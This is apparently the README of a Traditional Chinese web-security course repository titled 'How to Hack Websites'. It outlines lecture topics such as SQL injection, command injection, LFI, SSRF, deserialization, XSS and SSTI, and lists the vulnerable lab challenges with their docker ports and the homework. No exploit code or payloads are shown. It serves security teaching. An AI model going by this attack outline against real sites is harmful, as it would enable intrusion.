/How-to-Hack-Websites

開源的正體中文 Web Hacking 學習資源 - 程式安全 2021 Fall

Primary LanguagePHP

How to Hack Websites

Videos

Topics

初章

Full slide

  • Web & Web security introduction [slide]
  • Access control & Bussiness logic
  • Recon & Information leak [slide]
  • Insecure Upload / Path traversal / LFI [slide]
  • Basic injection [slide]
    • Code injection
    • Command injection
    • SQL injection: Basic

續章

Full slide

  • SQL injection: Advanced
    • Union-based
    • Boolean-based
    • Other
  • Server-side request forgery (SSRF)
  • Insecure deserialization
    • Intro
    • Pickle

終章

Full slide

  • Insecure deserialization [slide]
    • PHP
    • POP Chain
    • Misc (Java, .NET etc.)
  • Frontend security: Basic [slide]
    • Same-origin policy
    • CSRF
    • XSS
  • Frontend security: Content Security Policy (CSP) [slide]
  • Frontend security: Advanced
  • Advanced injection
    • NoSQL injection
    • Server-side template injection (SSTI)
  • Misc
    • JavaScript prototype pollution [slide]
    • XXE

Labs

題目之後的 數字 代表的是 docker 對外通訊埠編號

  • Basic
    • Cat Shop 8100
  • SQL injection
    • Login me: Login bypass 8200
    • Login me again: UNION-based SQL injection 8201
  • Command injection
    • DNS tool 8300
    • DNS tool: WAF edition 8301
  • LFI
    • Meow site: Basic LFI 8400
    • HakkaMD: LFI to RCE 8401
  • SSRF
    • Web Preview Service: Use gopher:// to forge a request 8500
    • SSRFrog: Bypass blacklist 8501
  • Deserialization
    • Pickle 8600
    • Cat: Basic PHP unserialize 8601
    • Magic cat: POP chain 8602
  • SSTI
    • Jinja2 SSTI 8700
  • Frontend
    • XSS 8800

Homework

  • Imgura: Information Leak / Upload / LFI
  • DVD Screensaver: Path traversal / SQL injection / Signed Cookie
  • Profile Card: XSS / CSRF / CSP Bypass
  • Double SSTI: SSTI
  • Log me in: FINAL: SQL injection / Information Leak